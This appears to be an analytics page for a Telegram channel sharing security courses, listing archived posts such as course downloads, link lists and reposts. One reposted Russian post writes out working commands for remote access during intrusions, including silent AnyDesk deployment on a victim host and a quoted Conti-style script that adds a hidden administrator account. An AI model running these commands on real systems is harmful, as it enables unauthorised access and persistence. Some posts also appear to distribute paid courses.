es
Feedback
All Security Engineering Courses

All Security Engineering Courses

Ir al canal en Telegram

This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!

Mostrar más

📈 Análisis del canal de Telegram All Security Engineering Courses

El canal All Security Engineering Courses (@allsecurityengineeringcourses) en el segmento lingüístico de Inglés es un actor destacado. Actualmente la comunidad reúne a 19 015 suscriptores, ocupando la posición 6 909 en la categoría Tecnologías y Aplicaciones y el puesto 35 119 en la región Rusia.

📊 Métricas de audiencia y dinámica

Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 19 015 suscriptores.

Según los últimos datos del 31 julio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 167, y en las últimas 24 horas de 3, conservando un alto alcance.

  • Estado de verificación: No verificado
  • Tasa de interacción (ER): El promedio de interacción de la audiencia es 13.22%. Durante las primeras 24 horas tras publicar, el contenido suele obtener N/A% de reacciones respecto al total de suscriptores.
  • Alcance de las publicaciones: Cada publicación recibe en promedio 2 514 visualizaciones. En el primer día suele acumular 0 visualizaciones.
  • Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 3.
  • Intereses temáticos: El contenido se centra en temas clave como git, strace, github, linux, docker.

📝 Descripción y política de contenido

El autor describe el recurso como un espacio para expresar opiniones subjetivas:
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...

Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 01 agosto, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.

19 015
Suscriptores
+324 horas
+467 días
+16730 días
Archivo de publicaciones
Operation MUZABI

Xato-net-10-million-usernames

Operation Cobalt Kitty _Attack Lifecycle

Offsec101 LABS offensive-security-labs (PWB - old lab manual)

Offsec101 - 3of3 (PWB - old video)

Offsec101 - 2of3 (PWB - old video)

Offsec101 - 1of3 (PWB - old video)

Repost from 1N73LL1G3NC3
BloodHound Query Library A collection of Cypher queries designed to help BloodHound users to unlock the full potential of the
BloodHound Query Library A collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem. Blog: https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/

+2
@WickHelps_demy_Course_–_Malware_Development_for_Ethical_Hackers.zip2924.42 MB

#Exclusive 🔥 #First_Time_Ever 🔥 Udemy Course – Malware Development for Ethical Hackers & Pentesters🔥🆕 👨‍💻 Password : @W
#Exclusive 🔥 #First_Time_Ever 🔥 Udemy Course – Malware Development for Ethical Hackers & Pentesters🔥🆕 👨‍💻 Password : @WickHelps ❤️ Exam Guide : link ❗️ Backup all channels Link 🔮 Any-Issues: Chat Here 🔽DownloadHere

Repost from RedTeam brazzers
Всем привет! В чате иногда возникает вопрос: «А как обеспечить себя графическим интерфейсом в ходе пентестов?» И иногда дейст
Всем привет! В чате иногда возникает вопрос: «А как обеспечить себя графическим интерфейсом в ходе пентестов?» И иногда действительно хочется посмотреть на чужой монитор своими глазами, отойдя от замыленных зеленых консолек. В посте собрал список инструментов для решения такой задачи :) Самый простой способ — включай RDP.
nxc smb 10.10.10.10 -u admin -p admin -M rdp -o ACTION=enable METHOD=smb

nxc wmi 10.10.10.10 -u admin -p admin -M rdp -o ACTION=enable METHOD=wmi

# опционально добавляем себя в Remote Desktop Users
Однако для совершения этой операции потребуются права админа, а они есть далеко не всегда, поэтому мы можем посмотреть в сторону VNC, например, POC vncdll. Впрочем, иногда смотрят в сторону AnyDesk. Для развертывания есть скрипт-ванлайнер:
# deploy.cmd
C:\Users\victim\AppData\Local\Temp\anydesk.exe --install C:\Users\victim\AppData\Local\AnyDesk --start-with-win --silent
del C:\Users\victim\AppData\Local\Temp\anydesk.exe
echo Passw0rd! | C:\Users\victim\AppData\Local\AnyDesk\AnyDesk.exe --set-password
for /f "delims=" %i in ('C:\Users\victim\AppData\Local\AnyDesk\AnyDesk.exe --get-id') do echo %i

# Запускаем скрипт
cme smb 192.168.0.1 -u victim -p 'Passw0rd!' -x deploy.cmd
Этим способом любит пользоваться Conti, они разворачивают вот так:
Function AnyDesk {

   mkdir "C:\ProgramData\AnyDesk"
   # Download AnyDesk
   $clnt = new-object System.Net.WebClient
   $url = "http://download.anydesk.com/AnyDesk.exe"
   $file = "C:\ProgramData\AnyDesk.exe"
   $clnt.DownloadFile($url,$file)


   cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent


   cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password


   net user oldadministrator "qc69t4B#Z0kE3" /add
   net localgroup Administrators oldadministrator /ADD
   reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f

   cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id

   }

  AnyDesk
А их коллеги — LockBit — разворачивают Google Chrome Remote Desktop:
# Download from Google
powershell  -c (New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $env:ProgramData+'\\1.msi')

# Install
msiexec /i C:\\ProgramData\\1.msi
Наконец, в нашем небольшом чатике коллеги накидали иные варианты: - https://rustdesk.com/ ; - https://www.supremocontrol.com/ ; - https://www.n-able.com/products/n-sight-rmm ; - https://github.com/miroslavpejic85/p2p ; - https://github.com/ps1337/reinschauer .

PENTESTING WITH PARROT OS Learn Hacking from Basic to Pro -------------------------------------------------------- Channel Link ➧More Channels | ➧Add Chat | ➧Shop

Repost from Offensive Xwitter
😈 [ Synacktiv @Synacktiv ] Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d. 🔗 https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025 🐥 [ tweet ]

Windows Privilege Escalation

@WickHelps-EC510 Videos + PDF 2025.4.zip3529.15 MB

@WickHelps-EC510 Videos + PDF 2025.4.z013891.20 MB

#Exclusive 🔥 #First_Time_Ever 🔥 Course SEC510 Cloud Security Controls and Mitigations🔥🆕 👨‍💻 Password : @WickHelps ❤️ Ex
#Exclusive 🔥 #First_Time_Ever 🔥 Course SEC510 Cloud Security Controls and Mitigations🔥🆕 👨‍💻 Password : @WickHelps ❤️ Exam Guide : link ❗️ Backup all channels Link 🔮 Any-Issues: Chat Here

ALL IN ONE AWSOME CYBERSEC RESOURCES By #TheStarkArmy (All open source resources) Awesome Red Team Ops https://github.com/CyberSecurityUP/Awesome-Red-Team-Operations Awesome Red Teaming https://github.com/yeyintminthuhtut/Awesome-Red-Teaming Awesome Red Team ToolKit https://0x1.gitlab.io/pentesting/Red-Teaming-Toolkit/ Awesome Blue Team Ops https://github.com/fabacab/awesome-cybersecurity-blueteam Awesome OSINT https://github.com/jivoi/awesome-osint Awesome DevSecOps https://github.com/devsecops/awesome-devsecop Awesome Pentest https://github.com/enaqx/awesome-pentest Awesome Cloud Pentest https://github.com/CyberSecurityUP/Awesome-Cloud-PenTest Awesome Shodan https://github.com/jakejarvis/awesome-shodan-queries Awesome AWS Security https://github.com/jassics/awesome-aws-security Awesome Malware Analysis & Reverse Engineering https://github.com/CyberSecurityUP/Awesome-Malware-Analysis-Reverse-Engineering Awesome Malware Analysis https://github.com/rshipp/awesome-malware-analysis The Cyber Security https://t.me/+M0_cfkd6HDxkYzI1 Awesome Computer Forensic https://github.com/cugu/awesome-forensics Awesome Cloud Security https://github.com/4ndersonLin/awesome-cloud-security Awesome Reverse Engineering https://github.com/tylerha97/awesome-reversing Awesome Threat Intelligence https://github.com/hslatman/awesome-threat-intelligence Awesome SOC https://github.com/cyb3rxp/awesome-soc Awesome Social Engineering https://github.com/v2-dev/awesome-social-engineering Awesome Web Security https://github.com/qazbnm456/awesome-web-security#prototype-pollution Awesome Forensics https://github.com/cugu/awesome-forensics Awesome API Security https://github.com/arainho/awesome-api-security Awesome WEB3 https://github.com/Anugrahsr/Awesome-web3-Security Awesome Incident Response https://github.com/Correia-jpv/fucking-awesome-incident-response Awesome Search Engines https://github.com/edoardottt/awesome-hacker-search-engines Awesome Smart Contract Security https://github.com/saeidshirazi/Awesome-Smart-Contract-Security The Cyber Security https://t.me/+M0_cfkd6HDxkYzI1 Awesome Terraform https://github.com/shuaibiyy/awesome-terraform Awesome Cloud Pentest https://github.com/CyberSecurityUP/Awesome-Cloud-PenTest Awesome Burpsuite Extensions https://github.com/snoopysecurity/awesome-burp-extensions Awesome IOT https://github.com/phodal/awesome-iot/blob/master/README.md Awesome IOS Security https://github.com/Cy-clon3/awesome-ios-security Awesome Embedded & IOT Security https://github.com/fkie-cad/awesome-embedded-and-iot-security Awesome OSINT Bots https://github.com/ItIsMeCall911/Awesome-Telegram-OSINT#-bots Awesome IOT Hacks https://github.com/nebgnahz/awesome-iot-hacks Awesome WEB3 Security https://github.com/Anugrahsr/Awesome-web3-Security Awesome Security https://github.com/sbilly/awesome-security Awesome Reversing https://github.com/tylerha97/awesome-reversing Awesome Piracy https://github.com/Igglybuff/awesome-piracy Awesome Web Hacking https://github.com/infoslack/awesome-web-hacking Awesome Memory Forensics https://github.com/digitalisx/awesome-memory-forensics Awesome OSCP https://github.com/0x4D31/awesome-oscp Awesome RAT https://github.com/alphaSeclab/awesome-rat Learn Hacking from Basic to Pro -------------------------------------------------------- Channel Link ➧Add Chat | ➧Shop

[ Выпуск 311 ] #2025год #Февраль Журнал Хакер